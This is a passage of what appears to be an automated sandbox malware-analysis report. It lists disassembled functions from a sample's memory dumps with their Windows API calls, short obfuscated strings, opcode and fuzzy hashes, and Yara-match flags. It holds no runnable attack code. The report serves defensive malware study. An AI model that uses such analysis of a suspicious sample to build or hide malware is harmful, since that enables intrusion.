                                            • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                            Function 100044D6 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667782007.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.2667767061.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667799628.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2667814596.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                            • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                            • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                            Function 04D1C2C7 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • RtlEncodePointer.NTDLL(00000000), ref: 04D1C2EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: EncodePointer
                                            • String ID: MOC$RCC
                                            • API String ID: 2118026453-2084237596
                                            • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction ID: 8e16835d7bfb3f1c2e63bd7adeb63dadcbd7cf20a90b367a0a0a759d7f9abe1e
                                            • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                            • Instruction Fuzzy Hash: 46412871A40209FFDF25DF98E980AEEBBB5FF48704F148059FD04A6261D335A950DB61
                                            Function 00401300 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040138C
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: KN$]DFE
                                            • API String ID: 2296764815-873640922
                                            • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                            • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                            • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                            Function 04D11567 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D115F3
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: KN$]DFE
                                            • API String ID: 4132704954-873640922
                                            • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction ID: 5a595a3bc9408e3b4be581a2d986bcac07745c354329672faf04467a4baf3c8b
                                            • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                            • Instruction Fuzzy Hash: AE2148F0F01284EAE720DF28F8557A8B7B0EF19308F848265E9551B271DB7566C6CB1D
                                            Function 00408410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 0040847E
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                            • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                            • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                            Function 00407E50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407EBE
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: CD^O$_DC[
                                            • API String ID: 2296764815-3597986494
                                            • Opcode ID: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction ID: 75c8c8ce13ad0cb5c53a0921d7a0f1eb8d827427a00a4f276ef8137bbb37e5e9
                                            • Opcode Fuzzy Hash: 763e4a14a1476fea278d585dab10dabfb5d17371b066c90e302f9cae630bd372
                                            • Instruction Fuzzy Hash: 5601DB71F05248CFC720EBA4ED4196A7760AB15304F90017EE51967391D6785D41874F
                                            Function 04D18677 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D186E5
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction ID: 5c75b144f3d06f6e04e78f2f1c6efddfb9edd8a136d5b4b745c2fa1b5a1e5a43
                                            • Opcode Fuzzy Hash: 7341acffab0f8a50cb3dab6dc950932259dbe6591db13ae44b5a8b6a513e7e4b
                                            • Instruction Fuzzy Hash: 0B0149B0F44358ABC720FF7CFD91A5D73A0EB18210F9005A9D91057360DB74B585CB99
                                            Function 04D180B7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D18125
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: CD^O$_DC[
                                            • API String ID: 4132704954-3597986494
                                            • Opcode ID: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction ID: 4bd38603a4397769e654feb31922a337d91e78b733cd913e7ba32a7839ea3813
                                            • Opcode Fuzzy Hash: 1a70cf315e0b4c7e3d836be999733c222d33353a0e53b5b2c205e893295131da
                                            • Instruction Fuzzy Hash: 730126F1F01258ABC720EF68FC51A69B3A0EB05200FA001A9EC195B360D6346585CB56
                                            Function 00407800 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407869
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$EDO*
                                            • API String ID: 2296764815-3480089779
                                            • Opcode ID: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                            • Instruction ID: 2c0c492e7e72bdb30d52bd5223af33e2dc0730c32d16496d374a94bf7777f62b
                                            • Opcode Fuzzy Hash: c1255349a2e57ad23b9470b93f2817b8619d13366b065ca6f952b4fb9d144549
                                            • Instruction Fuzzy Hash: 5B016275F08208DBDB20EFA5D842E5DB7B0AB14708F50417ED916A7791DA38AD02CF4D
                                            Function 00407910 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                              • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                            • __Init_thread_footer.LIBCMT ref: 00407979
                                              • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                              • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                              • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2664608279.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                            • String ID: DCDO$^]E*
                                            • API String ID: 2296764815-2708296792
                                            • Opcode ID: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                            • Instruction ID: a49365da1333b78fae32507e70f919b170a79118b3a39b38b1efb03faeb462bb
                                            • Opcode Fuzzy Hash: ffab40d94f7747eb7ab79d41521036dd22da8b0a9ae6696f2e7e2344855eaeaf
                                            • Instruction Fuzzy Hash: 92011DB0F042089BD720EFA9E883A9DB7A0A784704F90417FE919A7391D6396D81CF4D
                                            Function 04D17A67 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D17AD0
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$EDO*
                                            • API String ID: 4132704954-3480089779
                                            • Opcode ID: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction ID: d5494cf928be0d40734a95ec6150a6cd70083cfba943cde96bb13c5beedec1ce
                                            • Opcode Fuzzy Hash: 0c4b274b1f736970c2523dd1c5506a016ef446dce9cac0d32a5329abb2f60a7d
                                            • Instruction Fuzzy Hash: 62016DB4F44208EBDB20DFA4E891E5DB7B0EB14704F9041BADC15973A0DA35AA46CF59
                                            Function 04D17B77 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 04D19EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EF7
                                              • Part of subcall function 04D19EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19F34
                                            • __Init_thread_footer.LIBCMT ref: 04D17BE0
                                              • Part of subcall function 04D19EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04D19EAC
                                              • Part of subcall function 04D19EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04D19EDF
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2667150208.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d10000_file.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                            • String ID: DCDO$^]E*
                                            • API String ID: 4132704954-2708296792
                                            • Opcode ID: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction ID: 2e30c873e3a7fdf1ded5eebf02bd762e8e97e9341573f318e6475c42667f2513
                                            • Opcode Fuzzy Hash: 11f08cc739a34c9adf3450d8bd9b345e73f0704a249345ec43240eb2c7ab1f2c
                                            • Instruction Fuzzy Hash: B4016DF0F41208ABD720DFA8E992A9D77A0E744704F9041BAEC15573A0DA35B985CF59